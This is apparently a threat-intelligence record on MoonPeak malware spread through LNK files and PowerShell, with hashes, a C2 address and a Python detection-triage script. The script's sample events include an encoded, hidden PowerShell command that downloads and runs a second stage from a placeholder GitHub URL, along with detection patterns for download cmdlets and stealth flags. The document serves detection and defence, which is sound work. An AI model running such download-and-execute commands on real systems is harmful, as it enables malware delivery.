Malware MoonPeak Executed via LNK Files

Jan. 26, 2026, 6:03 p.m.

Description

In January 2026, IIJ observed malicious LNK files targeting Korean users that execute the MoonPeak malware, attributed to North Korean threat actors. The infection chain begins with an LNK file that runs an obfuscated PowerShell script; this first stage checks for analysis environments, creates additional scripts, and sets up persistence. The second stage downloads and executes a payload hosted on GitHub, which is the MoonPeak malware itself. MoonPeak is obfuscated with ConfuserEx and communicates with a C2 server. Hosting the malware on GitHub is an instance of Living Off Trusted Sites (LOTS), in which attackers place malicious content on legitimate, trusted services. This campaign demonstrates the ongoing threat posed by North Korean actors targeting countries and individuals worldwide.
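The chain described above (LNK launch, obfuscated PowerShell, download from GitHub, C2 traffic) leaves a recognisable footprint in endpoint process telemetry. The following triage script is an added example, not code from IIJ or from this record: it scores constructed process-creation events for the traits the description names. The sample events, the scoring weights, the explorer.exe parent heuristic, the PowerShell flag and download-cmdlet patterns, and the PLACEHOLDER GitHub URL are all assumptions made for illustration; the only value taken from this page is the C2 address in `KNOWN_C2`.

```python
import base64
import re
from dataclasses import dataclass, field

# Constructed sample telemetry, modelled on process-creation events (Sysmon Event ID 1
# style). These are assumptions about what the LNK -> PowerShell -> GitHub chain could
# look like on an endpoint, not data from the IIJ report. The GitHub URL is a placeholder.
STAGE1_SCRIPT = (
    r"Invoke-WebRequest -Uri https://raw.githubusercontent.com/PLACEHOLDER-ORG/PLACEHOLDER-REPO/main/s.txt "
    r"-OutFile $env:TEMP\stage2.ps1; powershell -nop -w hidden -File $env:TEMP\stage2.ps1"
)
ENCODED_STAGE1 = base64.b64encode(STAGE1_SCRIPT.encode("utf-16le")).decode()

SAMPLE_EVENTS = [
    {"id": 1, "image": "powershell.exe", "parent": "explorer.exe",
     "cmdline": f"powershell.exe -w hidden -nop -ep bypass -enc {ENCODED_STAGE1}", "dest_ip": None},
    {"id": 2, "image": "powershell.exe", "parent": "cmd.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1", "dest_ip": None},
    {"id": 3, "image": "powershell.exe", "parent": "Code.exe",
     "cmdline": 'powershell.exe -Command "git clone https://github.com/example-org/tool.git"', "dest_ip": None},
    {"id": 4, "image": "powershell.exe", "parent": "powershell.exe",
     "cmdline": r"powershell.exe -nop -w hidden -File C:\Users\Public\stage2.ps1", "dest_ip": "27.102.137.88"},
]

KNOWN_C2 = {"27.102.137.88"}  # the C2 address listed in this record's indicators

# Heuristic patterns (assumptions, not from the report): PowerShell's encoded-command
# switch, common "quiet" switches, download cmdlets, and GitHub hosts used for LOTS.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:enc|encodedcommand|ec|e)\s+([A-Za-z0-9+/=]{16,})")
STEALTH_FLAGS = re.compile(r"(?i)-(?:w(?:indowstyle)?\s+hidden|nop\b|noprofile|ep\s+bypass|executionpolicy\s+bypass)")
DOWNLOAD_CMDLET = re.compile(r"(?i)(?:invoke-webrequest|iwr|invoke-restmethod|irm|downloadstring|downloadfile|start-bitstransfer)")
GITHUB_HOST = re.compile(r"(?i)(?:raw\.githubusercontent\.com|gist\.github\.com|github\.com)")


@dataclass
class Finding:
    event_id: int
    score: int
    reasons: list[str] = field(default_factory=list)


def decode_encoded_command(cmdline: str) -> str:
    """Return the UTF-16LE script behind -EncodedCommand, or "" if absent/undecodable."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le", errors="ignore")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_event(event: dict) -> Finding:
    """Score one process event; each matched trait adds weight and a human-readable reason."""
    f = Finding(event["id"], 0)
    cmdline = event["cmdline"]
    decoded = decode_encoded_command(cmdline)
    text = cmdline + " " + decoded  # inspect the visible and the decoded command together

    if event["parent"].lower() == "explorer.exe":  # assumption: double-clicked LNK spawns from explorer
        f.score += 1; f.reasons.append("launched from explorer.exe (consistent with an LNK double-click)")
    if STEALTH_FLAGS.search(cmdline):
        f.score += 1; f.reasons.append("hidden window / no profile / execution policy bypass")
    if decoded:
        f.score += 1; f.reasons.append("encoded command line (decoded for inspection)")
    if DOWNLOAD_CMDLET.search(text) and GITHUB_HOST.search(text):
        f.score += 2; f.reasons.append("PowerShell download from a GitHub host (LOTS)")
    if event.get("dest_ip") in KNOWN_C2:
        f.score += 3; f.reasons.append(f"connection to known C2 {event['dest_ip']}")
    return f


def triage(events, threshold: int = 3) -> list[Finding]:
    """Return findings at or above threshold, highest score first."""
    hits = [score_event(e) for e in events]
    return sorted((h for h in hits if h.score >= threshold), key=lambda h: -h.score)


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"event {hit.event_id}: score {hit.score}")
        for r in hit.reasons:
            print("   -", r)
```

Event 3 shows why the download-cmdlet and GitHub-host checks are combined: a developer cloning a repository touches github.com but scores nothing, while event 1 (hidden, encoded, explorer-launched, downloading from raw.githubusercontent.com) and event 4 (second stage talking to the listed C2 address) cross the threshold. Decoding the `-EncodedCommand` payload before matching is what lets the GitHub download in event 1 be seen at all.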

Date

  • Created: Jan. 26, 2026, 2:28 p.m.
  • Published: Jan. 26, 2026, 2:28 p.m.
  • Modified: Jan. 26, 2026, 6:03 p.m.

Indicators

  • 8de36cb635eb87c1aa0e8219f1d8bf2bb44cad75b58ef421de77dd1aae669bf4
  • aaac6eadac6c325bfc69b561d75f7cfd979ac289de1cc4430c5cc9a9a655b279
  • 1553bfac012b20a39822c5f2ef3a7bd97f52bb94ae631ac1178003b7d42e7b7f
  • 27.102.137.88

Attack Patterns

Additional Information

  • Finance